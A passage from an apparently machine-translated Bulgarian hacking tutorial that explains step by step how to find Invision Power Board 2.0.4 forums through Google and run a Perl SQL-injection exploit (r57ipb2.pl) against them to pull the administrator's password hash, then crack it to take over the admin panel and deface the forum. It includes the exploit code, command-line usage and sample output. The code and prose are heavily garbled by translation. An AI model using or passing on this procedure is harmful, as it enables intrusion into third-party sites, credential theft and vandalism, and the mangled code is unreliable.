Как да се използва експлойта)
Така че ... Ако честно zadalbali въпрос "как да използвате sploitov"
Е, най-вероятно да започне
Като цяло инструкции стъпка по стъпка как да използвате [б] експлойта [/ б]!
Попитайте защо е необходимо? Eksploity - скриптове, които използват портали за уязвимост, форуми и т.н. С sploitov може да доведе администратор хешове офлайн, например, в последствие се наложи да Достум администраторския контролен панел и обезобразят форум.
Например, ние ще използваме SQL-инжекция във форуми IPB на до версия 2.0.4 Уязвимост сигурност стар, но пълен с дупки във форумите на мрежата са били, са и ще бъдат там.
Така prodolzhim.Dlya за нас да се намери подходящият форум, разбира се, ние се изкачи до [й], Google [/ б] Дала изкачване в разширено търсене и влиза в нашите zapros.Zapros ще vygledet така [б] Invision Board Мощност 2.0.4 [/ б] и настроите желаната стойност от 100 места по ключова дума, но с разходите по подразбиране 10.
Така че ние открихме, форум, на който стои Invision Power Board 2.0.4.
Тогава ние се изкачи отново на Google и търсене на употребявате за Invision Power Board 2.0.4 версия.
Така че ние открихме нашите sploit.A експлоатират прилича
$ Сървър = $ ARGV [0];
$ Path = $ ARGV [1];
$ Member_id = $ ARGV [2];
$ Целева = $ ARGV [3];
] СЪРВЪРА: $ serverrn ";
отпечатва "[
] PATH: $ pathrn ";
отпечатва "[
] ID на: $ member_idrn ";
отпечатва "[
] ПРЕДНАЗНАЧЕН: $ мишена ";
печат (($ цел) ( "- Опел 2. *") :( "- IPB 1. *"?));
печат «ина»;
отпечатва "[
] В ТЪРСЕНЕ ПАРОЛА ... [|] ";
под чек ($)
$ М ++;
статус ();
$ Ccheck = $ _ [0];
$ Pass_hash1 = "% 36% 36% 36% 2 527 процента 20% 4F% 52% 20% 28% 69% 64% 3D";
$ Pass_hash2 = "% 20% 41% 4Е% 44% 20% 61% 73% 63% 69% 69% 28% 73% 75% 62% 73% 74% 72% 69% 6Е% 67% 28";
$ Pass_hash3 = $ подаване "," $ s_num ", 1))" $ ccheck ") / *" .....;
$ Pass_hash3 =
и /(.)/"% "(% 2.2x", ORD ($ 1)) / например UC sprintf () ".
$ Nmalykh = "% 20";
$ Socket = IO :: Socket :: INET-> нов (Proto => «TCP», PeerAddr => "$ сървър", PeerPort => «80»);
ФОРМАТ $ гнездо ( «GET% sindex.php акт = LoginCODE = автоматично влизане HTTP / 1.0nHost:% snAccept: * / * nCookie: member_id =% S; pass_hash =% S% S% S% S% snConnection :? closenn»,
$ Path, $ сървър, $ cmember_id, $ pass_hash1, $ cmember_id, $ pass_hash2, $ pass_hash3, $ nmalykh);
r57ipb2.pl [сървър] [/ папка /] [member_id] [мишена]
[Сървър] - домакин, където инсталиран IPB
[/ Папка /] - папка, където инсталиран IPB
[Member_id] - потребителско име за груба
цели:
0 - IPB 1. *
1 - Опел 2. * (преди 2.0.4)
Осъзнаваш ли подвиг написан на Perl / За да го zayuzat, ние се нуждаем от програма под името [б] ActivePerl [б] skchat тя може да бъде [б] [един HREF = «soft.softodrom.ru/ap/p478.shtml»] тук [/ а] [Ь]
По този начин, инсталиран на преводача. Пусни го:
Start-> хода на подготовката> CMD
В подканата набиране:
C: put_k_Perl C: put_k_faylu_imya.pl сайт / papka_s_forumom / 1 0
когато:
C: put_k_Perl - е пътят до файла преводач, например C: perlbinperl
C: put_k_faylu_imya.pl - път да ви спаси с sploitov код файла
сайт - сайт за на форума, достъпът до които искате да получавате такива lamer.com
papka_s_forumom - папката на сървъра, на който инсталира онлайн двигателя (вижте адреса на браузъра)
1 - идентификатор на потребителя, чието сегментиране искаме да доведе. защото ние се нуждаем от администратор хеша, сложи уреда, първо patamushta Offline regisriruyutsa estessno администратори
0 - Версия искаме vzlamat (0 - IPB 1. *, 1 - Опел 2. *)
String CMD в ще изглежда по следния начин:
C: perlbinperl в: ipb.pl terion.com / форум / 1 0
Всичко, натиснете Enter и изчакайте.
Ако направи всичко по силите и на форума не е поправена, ще видите нещо подобно следната картина:
r57ipb2.pl blah.com / ipb13 / 1 0
[
] ПРЕДНАЗНАЧЕН: 0 - IPB 1. *
[
] ТЪРСЕНЕ ПАРОЛА ... [СЪСТАВЕНО]
ID на: 1
Парола: 5f4dcc3b5aa765d61d8327deb882cf99
Тук той хеширате: 5f4dcc3b5aa765d61d8327deb882cf99
Сега ние го разшифровате по всеки възможен начин и да получите паролата за администратора на форума.